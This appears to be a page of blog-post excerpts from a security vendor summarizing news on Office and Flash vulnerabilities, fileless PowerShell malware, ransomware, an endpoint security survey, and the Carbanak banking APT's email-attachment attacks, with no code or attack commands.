Two days ago, researchers at TarLogic published a proof-of-concept APT that leverages CVE-2017-11826, a Microsoft Office 0-day vulnerability existing in all Office versions. Microsoft issued a patch for the vulnerability in October, however many systems still remain at risk.
Cybersecurity had a turbulent 2016, to say the least. We saw the rise of ransomware, the emergence of IoT botnets, landmark security legislation and Yahoo’s disclosure about its 1-billion-record-hack, the largest in history.
With fileless malware popping up more and more frequently, particularly sophisticated PowerShell attacks, we thought it useful to examine these threats by reverse engineering those in-memory samples from Virus Total that have the lowest detection rates.
Recently, software engineer and noted tech journalist Ben Dickson explored the growing threat of ransomware in an article in The Daily Dot. He gives a thorough yet remarkably non-techie overview before tackling the difficult part – what can companies and individuals do to protect themselves. Dickson turned to our own Ronen Yehoshua, CEO of Morphisec, to understand why traditional security approaches fail and possible solutions.
Yet another critical Flash vulnerability was uncovered this month, thanks to researchers at FireEye. The vulnerability, CVE-2016-4117, exists in Flash 188.8.131.52 and earlier versions for Windows, Mac, Linux, and Chrome OS. It received a CVSS v3 rating of 9.8, indicating extremely critical (Adobe rushed out a patch earlier this week).
The technology research group TechTarget recently published their findings from a survey on endpoint security at medium to large enterprises. The results corroborate trends all too evident in the news: Despite the features and functionality added to endpoint protection software over the last few years, “organizations are still in search of effective protection techniques against unknown threats and malware.”
The Carbanak APT group, aka “Anunak,” (dubbed Carbanak by Kaspersky Labs to reflect its Carberp origins) is one of the most notorious cybercriminal groups to target the Financial sector. Since Carbanak was first released in December 2014, around 100 financial institutions in approximately 30 countries have fallen victim to it, losing nearly $1 billion. Carbanak attacks begin with malware infected documents sent as email attachments to targeted bank employees. The malicious document is accompanied by an email message establishing an innocent seeming context. Once activated, the document delivers the malware, usually by exploiting an unpatched Office application vulnerability, in this case Microsoft Word. After obtaining the required credentials / data from the unprotected target victims, the Carbanak malware continues to its next stage of infiltrating the financial institution’s network.